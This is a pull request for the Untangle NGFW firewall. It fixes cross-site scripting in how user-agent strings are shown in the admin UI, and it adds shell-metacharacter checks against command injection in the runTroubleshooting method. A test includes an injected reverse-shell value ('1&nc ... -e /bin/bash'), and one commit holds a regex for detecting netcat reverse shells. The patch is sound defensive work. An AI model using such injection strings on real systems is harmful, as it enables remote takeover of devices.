### PR TITLE
ngfw-14822 Cross scripting and execEvil method vulnerability Fix 

### DIFF
--- a/uvm/hier/usr/lib/python3/dist-packages/tests/test_network.py
+++ b/uvm/hier/usr/lib/python3/dist-packages/tests/test_network.py
@@ -2914,6 +2914,20 @@ server=dynupdate.no-ip.com
         global_functions.uvmContext.networkManager().setNetworkSettings(orig_netsettings)
         assert invalid_dns is False, "dns resolvers properly pinned to devices"
 
+    def test_710_runtroubleshoot_argument_exploit_test(self):
+        """
+        Verify argument exploit is not possible in runTroubleshooting functionality
+        """
+        # runTroubleshooting using arguments matching suspicious characters
+        execResult = global_functions.uvmContext.networkManager().runTroubleshooting("DNS", { "HOST": "1&nc 192.168.56.129:3333 -e /bin/bash" })
+        time.sleep(3)
+        assert(execResult == None)
+
+        # runTroubleshooting using valid arguments
+        execResult = global_functions.uvmContext.networkManager().runTroubleshooting("DNS", { "HOST": "amazon.com" })
+        time.sleep(3)
+        assert(execResult.getResult() == 0)
+
     @classmethod
     def final_extra_tear_down(cls):
         # Restore original settings to return to initial settings

--- a/uvm/impl/com/untangle/uvm/NetworkManagerImpl.java
+++ b/uvm/impl/com/untangle/uvm/NetworkManagerImpl.java
@@ -3062,9 +3062,11 @@ public class NetworkManagerImpl implements NetworkManager
             case DYNAMIC_ROUTING_OSPF:
             case ROUTING_TABLE:
             case QOS:
-            case DHCP_LEASES:
+            case DHCP_LEASES: {
+                if(argument != null && argument.contains("&")) throw new RuntimeException("runTroubleshooting suspicious argument: (" + argument + "), blocked");
+                
                 return UvmContextFactory.context().execManager().execOutputSafe(statusScript + " get_" + command.toString().toLowerCase() + " " + argument);
-
+            }
             default:
                 throw new RuntimeException("getStatus unknown command: " + command);
         }

--- a/uvm/impl/com/untangle/uvm/NetworkManagerImpl.java
+++ b/uvm/impl/com/untangle/uvm/NetworkManagerImpl.java
@@ -37,6 +37,7 @@ import com.untangle.uvm.network.DynamicRouteOspfArea;
 import com.untangle.uvm.network.DynamicRouteOspfInterface;
 import com.untangle.uvm.servlet.DownloadHandler;
 import com.untangle.uvm.util.ObjectMatcher;
+import org.apache.logging.log4j.Level;
 import org.apache.logging.log4j.LogManager;
 import org.apache.logging.log4j.Logger;
 import org.jabsorb.serializer.UnmarshallException;
@@ -3101,6 +3102,13 @@ public class NetworkManagerImpl implements NetworkManager
             case DOWNLOAD:
             case TRACE:
                 try{
+                    String revShellCmdRegex = "^.*nc.*-e.*$";
+                    for(String var : environment_variables) {
+                        if (var.contains(";") || var.contains("&&") || var.contains("|")
+                                || var.contains(">") || var.contains("$(") || var.matches(revShellCmdRegex)) {
+                            throw new RuntimeException("runTroubleshooting suspicious command: (" + environment_variables + "), blocked");
+                        }
+                    }
                     return UvmContextFactory.context().execManager().execEvil(new String[]{troubleshootingScript, "run_" + command.toString().toLowerCase()}, environment_variables.toArray(new String[0]));
                 }catch(Exception e){
                     logger.warn("runTroubleshooting executing:", e);

--- a/uvm/impl/com/untangle/uvm/NetworkManagerImpl.java
+++ b/uvm/impl/com/untangle/uvm/NetworkManagerImpl.java
@@ -37,7 +37,6 @@ import com.untangle.uvm.network.DynamicRouteOspfArea;
 import com.untangle.uvm.network.DynamicRouteOspfInterface;
 import com.untangle.uvm.servlet.DownloadHandler;
 import com.untangle.uvm.util.ObjectMatcher;
-import org.apache.logging.log4j.Level;
 import org.apache.logging.log4j.LogManager;
 import org.apache.logging.log4j.Logger;
 import org.jabsorb.serializer.UnmarshallException;

--- a/uvm/impl/com/untangle/uvm/NetworkManagerImpl.java
+++ b/uvm/impl/com/untangle/uvm/NetworkManagerImpl.java
@@ -3101,10 +3101,9 @@ public class NetworkManagerImpl implements NetworkManager
             case DOWNLOAD:
             case TRACE:
                 try{
-                    String revShellCmdRegex = "^.*nc.*-e.*$";
                     for(String var : environment_variables) {
-                        if (var.contains(";") || var.contains("&&") || var.contains("|")
-                                || var.contains(">") || var.contains("$(") || var.matches(revShellCmdRegex)) {
+                        if (var.contains(";") || var.contains("&") || var.contains("|")
+                                || var.contains(">") || var.contains("$(")) {
                             throw new RuntimeException("runTroubleshooting suspicious command: (" + environment_variables + "), blocked");
                         }
                     }

--- a/uvm/js/common/util/Converter.js
+++ b/uvm/js/common/util/Converter.js
@@ -120,5 +120,17 @@ Ext.define('Ung.util.Converter', {
     // },
 
     // not implemented, see old Renderer
-    webRule: function () {}
+    webRule: function () {},
+
+    /**
+     * This function is used to convert the httpUserAgent string 
+     * to html encoded string for rendering on UI
+     */
+    userAgentEncode: function(value) {
+        // Decode any already-encoded characters
+        var decodedValue = Ext.String.htmlDecode(value);
+
+        // Encode the decoded value to ensure proper encoding
+        return Ext.String.htmlEncode(decodedValue);
+    }
 });

--- a/uvm/servlets/admin/app/view/extra/Devices.js
+++ b/uvm/servlets/admin/app/view/extra/Devices.js
@@ -89,7 +89,8 @@ Ext.define('Ung.view.extra.Devices', {
         }, {
             name: 'httpUserAgent',
             type: 'string',
-            sortType: 'asUnString'
+            sortType: 'asUnString',
+            convert: Converter.userAgentEncode
         }, {
             name: 'lastSessionTime',
             sortType: 'asTimestamp',

--- a/uvm/servlets/admin/app/view/extra/Hosts.js
+++ b/uvm/servlets/admin/app/view/extra/Hosts.js
@@ -89,7 +89,8 @@ Ext.define('Ung.view.extra.Hosts', {
         },{
             name: 'httpUserAgent',
             type: 'string',
-            sortType: 'asUnString'
+            sortType: 'asUnString',
+            convert: Converter.userAgentEncode
         },{
             name: 'captivePortalAuthenticated',
         },{


### PR DESCRIPTION
**Changes:**
1. Added a field converter for `httpUserAgent` field on Hosts and Devices pages, so that any cross scripting can be prevented. 
This change handles the phase 1 part of attack given in POC script.
2. Added a suspicious command check in `runTroubleshooting` method for environment_arguments. This is to avoid phase 2 of attack
3. Added a test case to verify argument exploit is not possible.
![Screenshot from 2024-09-19 20-10-09](https://github.com/user-attachments/assets/e3fe593b-a544-4254-8191-c41dc33f8a3f)
